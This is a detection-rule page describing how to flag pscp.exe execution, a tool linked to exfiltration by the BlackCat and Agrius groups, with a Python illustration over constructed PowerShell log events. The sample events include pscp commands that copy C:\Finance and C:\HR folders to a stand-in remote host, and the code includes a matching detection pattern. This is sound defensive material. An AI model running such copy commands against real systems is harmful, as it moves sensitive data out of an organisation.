
PuTTY Secure Copy Client Execution

Anvilogic Forge

Summary
The detection rule identifies execution of the PuTTY Secure Copy Client (pscp.exe), a tool in the PuTTY suite used for secure file transfers over SSH. Threat actors, notably the BlackCat and Agrius groups, have used this executable to exfiltrate sensitive data from compromised environments. The rule uses Splunk queries to extract the relevant event logs, focusing on PowerShell execution logs (EventCode 4104, script block logging) that record pscp.exe invocations. By matching on these events, the rule flags executions of pscp.exe and alerts security teams to potential data exfiltration. Results are aggregated by time, host, user and related process details to support investigation of each instance in which the client is used.
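As an added illustration (not Anvilogic's rule or its Splunk query), the following Python mirrors the 4104 branch of the detection over a handful of constructed PowerShell script block records: it flags script blocks that reference pscp.exe and aggregates hits by host and user with first/last time and count, the same fields the summary lists for triage. Hostnames, users, times and script text are all constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample records modelled on Windows PowerShell Operational log
# events (EventCode 4104, script block logging). Not real telemetry.
SAMPLE_EVENTS = [
    {"_time": "2024-02-09T10:01:12Z", "host": "WS-042", "user": "CORP\\jdoe",
     "EventCode": 4104, "ScriptBlockText": "Get-ChildItem C:\\Users\\jdoe\\Documents"},
    {"_time": "2024-02-09T10:03:40Z", "host": "WS-042", "user": "CORP\\jdoe",
     "EventCode": 4104, "ScriptBlockText": "& 'C:\\Program Files\\PuTTY\\pscp.exe' -r C:\\Finance user@host.example:/tmp/"},
    {"_time": "2024-02-09T10:02:05Z", "host": "WS-042", "user": "CORP\\jdoe",
     "EventCode": 4104, "ScriptBlockText": "Start-Process PSCP.EXE -ArgumentList '-r','C:\\HR','user@host.example:/tmp/'"},
    # A mention inside a string matches too; the aggregated context (host, user,
    # script text) is what lets an analyst dismiss such a hit quickly.
    {"_time": "2024-02-09T11:15:00Z", "host": "HELPDESK-01", "user": "CORP\\tsmith",
     "EventCode": 4104, "ScriptBlockText": "Write-Output 'reminder: remove pscp.exe from the build image'"},
    # Security-log process creation (4688) is a different data source and is
    # not considered by the 4104 branch mirrored here.
    {"_time": "2024-02-09T12:00:00Z", "host": "SRV-07", "user": "CORP\\svc_backup",
     "EventCode": 4688, "NewProcessName": "C:\\Tools\\pscp.exe"},
]

# Match pscp.exe as a standalone token (after a path separator, quote or space),
# case-insensitively, so a name such as "notpscp.exe" is not flagged.
PSCP_PATTERN = re.compile(r"(?<![\w.-])pscp\.exe\b", re.IGNORECASE)


def is_pscp_execution(event):
    """True for a 4104 script block whose text references pscp.exe."""
    if event.get("EventCode") != 4104:
        return False
    return PSCP_PATTERN.search(event.get("ScriptBlockText", "")) is not None


def aggregate_pscp_executions(events):
    """Group hits by (host, user) with first/last time, count and script blocks seen."""
    groups = defaultdict(lambda: {"count": 0, "first_seen": None,
                                  "last_seen": None, "script_blocks": []})
    for ev in events:
        if not is_pscp_execution(ev):
            continue
        ts = datetime.fromisoformat(ev["_time"].replace("Z", "+00:00"))
        g = groups[(ev["host"], ev["user"])]
        g["count"] += 1
        g["first_seen"] = ts if g["first_seen"] is None else min(g["first_seen"], ts)
        g["last_seen"] = ts if g["last_seen"] is None else max(g["last_seen"], ts)
        g["script_blocks"].append(ev["ScriptBlockText"])
    return dict(groups)
```

Running `aggregate_pscp_executions(SAMPLE_EVENTS)` yields two groups: two hits for WS-042/CORP\jdoe and one string-only mention for HELPDESK-01/CORP\tsmith, while the 4688 record is ignored.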
Categories
  • Endpoint
  • Cloud
  • On-Premise
Data Sources
  • Process
  • Application Log
ATT&CK Techniques
  • T1048
Created: 2024-02-09